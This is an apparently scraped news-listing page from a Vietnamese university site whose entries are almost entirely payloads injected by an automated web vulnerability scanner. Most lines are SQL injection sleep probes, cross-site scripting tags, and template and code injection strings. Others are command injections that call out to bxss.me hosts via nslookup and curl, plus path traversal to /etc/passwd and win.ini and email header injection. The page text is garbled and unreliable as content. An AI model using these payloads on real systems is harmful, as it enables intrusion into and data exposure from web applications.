1 1
1 1
@@Niyn7 1
1����%2527%2522 1
1'" 1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 1
xwwYUWpE')) OR 756=(SELECT 756 FROM PG_SLEEP(15))-- 1
lNG75xUT') OR 62=(SELECT 62 FROM PG_SLEEP(15))-- 1
sPS2UnTb' OR 855=(SELECT 855 FROM PG_SLEEP(15))-- 1
-1)) OR 429=(SELECT 429 FROM PG_SLEEP(15))-- 1
-5) OR 373=(SELECT 373 FROM PG_SLEEP(15))-- 1
-5 OR 14=(SELECT 14 FROM PG_SLEEP(15))-- 2
RECRmxo6')); waitfor delay '0:0:15' -- 1
flU7EJun'); waitfor delay '0:0:15' -- 1
K5aaTzHD'; waitfor delay '0:0:15' -- 1
1 waitfor delay '0:0:15' -- 1
-1)); waitfor delay '0:0:15' -- 1
-1); waitfor delay '0:0:15' -- 2
-1; waitfor delay '0:0:15' -- 1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 1
if(now()=sysdate(),sleep(15),0) 1
-1" OR 2+968-968-1=0+0+0+1 -- 2
-1' OR 2+900-900-1=0+0+0+1 or 'atgKZvVK'=' 1
-1' OR 2+376-376-1=0+0+0+1 -- 1
-1 OR 2+262-262-1=0+0+0+1 2
-1 OR 2+53-53-1=0+0+0+1 -- 1
8qB5tBrM 1
1 1
1 1
1 1
1 2
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 2
1 1
1 1
1 1
1 1
1 1
1 2
1<aXdpkVy< 1
1<img sRc='http://attacker-9081/log.php? 1
1<aGSh0R0 x=9652> 1
1<ifRAme sRc=9988.com></IfRamE> 1
1<W1W3CW>BWZNA[!+!]</W1W3CW> 1
18FtZT <ScRiPt >yT0w(9725)</ScRiPt> 1
1}body{zzz:Expre/**/SSion(yT0w(9743))} 1
<a HrEF=jaVaScRiPT:> 1
<a HrEF=http://xss.bxss.me></a> 1
1<input autofocus onfocus=yT0w(9307)> 1
�<img zzz onmouseover=yT0w(90171) //�> 1
1 1
1&lt;ScRiPt&gt;yT0w(9908)&lt;/sCripT&gt; 1
1\u003CScRiPt\yT0w(9129)\u003C/sCripT\u003E 2
%31%3C%53%63%52%69%50%74%20%3E%79%54%30%77%289262%29%3C%2F%73%43%72%69%70%54%3E 1
1<img/src=">" onerror=alert(9051)> 1
1<img src=xyz OnErRor=yT0w(9756)> 1
1<img src=//xss.bxss.me/t/dot.gif onload=yT0w(9403)> 1
1<body onload=yT0w(9661)> 1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9271'> 1
1<isindex type=image src=1 onerror=yT0w(9757)> 1
1 1
1<svg �onload=yT0w(9102);> 1
1<ScRiPt >yT0w(9740)</ScRiPt> 1
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9187></ScRiPt> 1
1<ScRiPt >yT0w(9279)</ScRiPt> 1
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%79%54%30%77%28%39%37%30%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 1
1<script>yT0w(9723)</script>9723 1
1<script>yT0w(9350)</script> 1
1<WDCJL1>YV6RT[!+!]</WDCJL1> 1
1 1
1<ScRiPt >yT0w(9850)</ScRiPt> 1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 1
dfb__${98991*97996}__::.x 1
dfb[[${98991*97996}]]xca 1
dfb{{98991*97996}}xca 1
1 1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 1
1 1
<th:t="${dfb}#foreach 1
1 1
<%={{={@{#{${dfb}}%> 1
bfgx6074%C0%BEz1%C0%BCz2a%90bcxhjl6074 1
1 1
1 1
bfg3872%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3872 1
1 1
19544932 1
1 1
1 1
1 1
'"()&%<zzz><ScRiPt >yT0w(9419)</ScRiPt> 1
1 1
1"||sleep(27*1000)*jaoebq||" 1
1'||sleep(27*1000)*uzzpwn||' 1
1'"()&%<zzz><ScRiPt >yT0w(9743)</ScRiPt> 1
1"&&sleep(27*1000)*utpsde&&" 1
1 1
1'&&sleep(27*1000)*pdytlx&&' 1
'"() 1
1
1
1 1
1 1
bxss.me 1
1
c:/windows/win.ini 1
/etc/shells 1
1 1
1 1
http://bxss.me/t/fit.txt%3F.jpg 1
1 1
Http://bxss.me/t/fit.txt 1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 1
<!-- 1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 1
1 1
1 1
;(nslookup -q=cname hitwjbyripddu41d65.bxss.me||curl hitwjbyripddu41d65.bxss.me)|(nslookup -q=cname hitwjbyripddu41d65.bxss.me||curl hitwjbyripddu41d65.bxss.me)&(nslookup -q=cname hitwjbyripddu41d65.bxss.me||curl hitwjbyripddu41d65.bxss.me) 1
1 1
'" 1
`(nslookup -q=cname hityrjrnjukrc81d08.bxss.me||curl hityrjrnjukrc81d08.bxss.me)` 1
1 1
'.print(md5(31337)).' 1
1 1
${@print(md5(31337))}\ 1
1 1
${@print(md5(31337))} 1
";print(md5(31337));$a=" 1
';print(md5(31337));$a=' 1
1 1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 1
1 1
1 1
|(nslookup -q=cname hithcemdqwtuaa1bcb.bxss.me||curl hithcemdqwtuaa1bcb.bxss.me) 1
1 1
'+'A'.concat(70-3).concat(22*4).concat(112).concat(70).concat(113).concat(89)+(require'socket' Socket.gethostbyname('hitui'+'qylzsrfs41974.bxss.me.')[3].to_s)+' 1
1 1
1 1
&(nslookup -q=cname hitihadcxxygw8d217.bxss.me||curl hitihadcxxygw8d217.bxss.me)&'\"`0&(nslookup -q=cname hitihadcxxygw8d217.bxss.me||curl hitihadcxxygw8d217.bxss.me)&`' 1
1 1
1 1
1 1
bxss.me/t/xss.html?%00 1
1 1
&nslookup -q=cname hitwlddikebcw12459.bxss.me&'\"`0&nslookup -q=cname hitwlddikebcw12459.bxss.me&`' 1
xfs.bxss.me 1
$(nslookup -q=cname hitlddzqmnoepfb201.bxss.me||curl hitlddzqmnoepfb201.bxss.me) 1
1 1
HttP://bxss.me/t/xss.html?%00 1
(nslookup -q=cname hithyauyfdqpmf07ee.bxss.me||curl hithyauyfdqpmf07ee.bxss.me)) 1
1 1
1 1
1 1
1 1
"+"A".concat(70-3).concat(22*4).concat(122).concat(86).concat(119).concat(86)+(require"socket" Socket.gethostbyname("hitdl"+"toqvpndq2b934.bxss.me.")[3].to_s)+" 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1|echo kwwteo$()\ mmlgeo\nz^xyu||a #' |echo kwwteo$()\ mmlgeo\nz^xyu||a #|" |echo kwwteo$()\ mmlgeo\nz^xyu||a # 1
|echo qgszdf$()\ itpmvd\nz^xyu||a #' |echo qgszdf$()\ itpmvd\nz^xyu||a #|" |echo qgszdf$()\ itpmvd\nz^xyu||a # 1
1 1
1 1
1 1
1 1
1&echo pvhnnt$()\ bnwdcc\nz^xyu||a #' &echo pvhnnt$()\ bnwdcc\nz^xyu||a #|" &echo pvhnnt$()\ bnwdcc\nz^xyu||a # 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
&echo atxkxf$()\ abpcrz\nz^xyu||a #' &echo atxkxf$()\ abpcrz\nz^xyu||a #|" &echo atxkxf$()\ abpcrz\nz^xyu||a # 1
1 1
echo rrqivq$()\ esqcjk\nz^xyu||a #' &echo rrqivq$()\ esqcjk\nz^xyu||a #|" &echo rrqivq$()\ esqcjk\nz^xyu||a # 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
^(#$!@#$)(()))****** 1
1 1
1 1
1 1
1 1
!(()&&!|*|*| 1
1 1
".gethostbyname(lc("hitiy"."gpryhsra7d44b.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(77).chr(113).chr(88)." 1
) 1
1 1
1 1
1 1
1 1
'.gethostbyname(lc('hitcu'.'phtedtvgaa003.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(75).chr(101).chr(71).' 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 1
1 1
1 1
1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
${10000370+9999618} 1
1 1
1 1
1<esi:include src="http://bxss.me/rpb.png"/> 1
1 1
1 1
1 1
"+response.write(9860545*9667615)+" 1
1 1
1 1
1 1
../1 1
1 1
1 1
1 1
file:///etc/passwd 1
../../../../../../../../../../../../../../windows/win.ini 1
1 1
../../../../../../../../../../../../../../etc/passwd 1
'+response.write(9860545*9667615)+' 1
1 1
to@example.com>%0d%0abcc:009247.36527-193002.36527.375cd.19824.2@bxss.me 1
1 1
1 1
1 1
1 1
1%0abcc:009247.36527-193001.36527.375cd.19824.2@bxss.me 1
response.write(9860545*9667615) 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1B76yq9VS4O 1
1 1
1 1
/../../../../../../../../../../windows/system32/BITSADMIN.exe 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1

Thông báo

1
 • 4/12/2024 3:45:44 AM 17
1
 • 4/12/2024 3:45:44 AM 18
1
 • 4/12/2024 3:45:41 AM 16

Tin mới nhất

1
 • 4/12/2024 3:57:34 AM 8
1
 • 4/12/2024 3:57:21 AM 8
1
 • 4/12/2024 3:57:09 AM 13
1
 • 4/12/2024 3:57:09 AM 17

Thông tin hội thảo
ngoài trường

1
 • 4/12/2024 4:02:55 AM 13
1
 • 4/12/2024 4:02:39 AM 16
@@V7xdV
 • 4/12/2024 4:02:20 AM 13

Thông tin NCKH
ngoài trường

1
 • 4/12/2024 4:30:17 AM 13
1
 • 4/12/2024 4:30:11 AM 12
@@wsy2i
 • 4/12/2024 4:30:03 AM 14